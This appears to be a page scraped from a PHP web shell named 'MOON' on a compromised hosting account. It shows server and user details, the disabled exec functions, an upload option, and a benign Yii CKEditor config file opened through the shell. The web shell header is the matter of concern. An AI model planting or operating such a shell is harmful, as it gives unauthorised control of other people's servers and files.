MOON
Server: Apache
System: Linux u18017238.onlinehome-server.com 3.10.0-1127.19.1.el7.x86_64 #1 SMP Tue Aug 25 17:23:54 UTC 2020 x86_64
User: emblazeone (1003)
PHP: 7.3.33
Disabled: exec,passthru,shell_exec,system
Upload Files
File: /home/emblazeone/public_html/limitlessfit/backend/config/params.php
<?php
return [
    'adminEmail' => 'admin@example.com',
    'bsVersion'=>'4',
    'ckeditor'=>[
//        'contentsCss'=>['/assets/7d97105a/css/style.css','/assets/7d97105a/css/ck_resetter_style.css'],
        'font_names' =>
            'Arial/Arial, Helvetica, sans-serif;'.
            'FiveMinutes/five_minutesregular;'.
            'Verdana/Verdana, Geneva, sans-serif',
        'colorButton_colors'=>'39464b,e61769,fabd2c,000,FFF',
        'preset'=>'full',
        'height'=>'250px',
        'inline'=>false,
    ],
];